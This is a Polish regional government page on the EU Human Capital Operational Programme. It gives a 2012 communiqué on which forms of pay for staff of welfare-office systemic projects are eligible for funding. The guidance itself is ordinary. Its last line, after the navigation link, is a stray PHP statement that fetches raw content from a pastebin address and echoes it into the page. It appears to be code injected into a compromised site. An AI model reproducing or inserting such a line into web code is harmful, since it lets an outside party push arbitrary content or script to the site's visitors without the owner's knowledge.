Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

23.01.2012 Komunikat Instytucji Zarządzającej Programem Kapitał Ludzki dotyczący wynagradzania personelu projektu systemowego realizowanego w ramach Priorytetu VII

Komunikat dotyczy projektów systemowych realizowanych przez Ośrodki Pomocy Społecznej (OPS) i Powiatowe Centra Pomocy Rodzinie (PCPR).


Niżej zawarte informacje wynikają z Zasad przygotowania, realizacji i rozliczania projektów systemowych Ośrodków Pomocy Społecznej, Powiatowych Centrów Pomocy Rodzinie oraz Regionalnego Ośrodka Polityki Społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 z 1 stycznia 2012 r. (dalej: Zasady) oraz Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki z 15 grudnia 2011 r. (dalej: Wytyczne), obowiązujących od 1 stycznia 2012 r.

Zgodnie z rozdz. 6.2 pkt 8 oraz rozdz. 6.3 Zasad, finansowanie zatrudnienia nowego pracownika, jak też finansowanie dodatkowego wynagrodzenia dotychczas zatrudnionego pracownika, realizującego bezpośrednio zadania w zakresie aktywnej integracji odbywa się zgodnie z warunkami określonymi w Wytycznych.

Zgodnie z podrozdz. 4.5 Wytycznych, przyznanie wynagrodzenia osobie będącej personelem projektu jest możliwe w szczególności w następujących formach:

  1. umowa o pracę w wymiarze całego lub części etatu;
  2. umowa cywilnoprawna;
  3. dodatek do podstawowego wynagrodzenia, przy czym wysokość dodatku wynika przede wszystkim z przepisów prawa krajowego, np. z ustawy z 21 listopada 2008 r. o pracownikach samorządowych (Dz. U. Nr 223, poz. 1458, z późn. zm.) i aktów wykonawczych wydanych na podstawie tej ustawy;

    jednocześnie podkreślić należy, że dodatek:
    • powinien dotyczyć zadań dodatkowych, np. związanych z realizacją projektu PO KL, wykraczających poza zadania przewidziane w podstawowym zakresie obowiązków danej osoby, które powinny być wyraźnie (tj. na piśmie) powierzone przez pracodawcę; wymiar dodatkowych zadań powinien być ukształtowany w taki sposób, aby zapewnić danej osobie możliwość realizacji jej podstawowych zadań;
    • powinien być przyznawany jedynie w okresie wykonywania dodatkowych zadań;
    • za kilka zadań dodatkowych, wykonywanych w tym samym czasie przez daną osobę wypłacany jest jeden dodatek.

Wydatki poniesione na podstawie jednej z wyżej wymienionych form przyznawania wynagrodzenia są kwalifikowalne, o ile spełniają wszystkie przesłanki i warunki kwalifikowalności określone w Wytycznych, w szczególności w podrozdz. 3.1 oraz 4.5 Wytycznych oraz są zgodne z obowiązującym prawem (ustawą z 26 czerwca 1974 r. - Kodeks pracy i ustawą z 21 listopada 2008 r. o pracownikach samorządowych).

W odniesieniu do nagród i premii podkreślić należy, że mogą one być kwalifikowalne wyłącznie, gdy są powiązane z umową o pracę w ramach projektu, a ich wysokość odpowiada stawkom stosowanym u beneficjenta i jest proporcjonalna do zaangażowania w realizację projektu, co oznacza, że jeśli np. pracownik jest zaangażowany do realizacji projektu PO KL na umowę o pracę w wymiarze 1/3 etatu, to kwalifikowalna w ramach projektu może być 1/3 nagrody/premii.

Z powyższego wynika, że nie może być uznane za kwalifikowalne wynagrodzenie personelu wypłacane w ramach projektu systemowego OPS i PCPR wyłącznie w postaci nagród bez wskazania zadań dotyczących projektu w umowie o pracę osoby będącej personelem projektu.

Powyższe ma zastosowanie do umów o pracę/cywilnoprawnych zawieranych od 1 stycznia 2012 r. oraz do dodatków i nagród lub premii przyznawanych po tym dniu.

 Dokument do pobrania


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");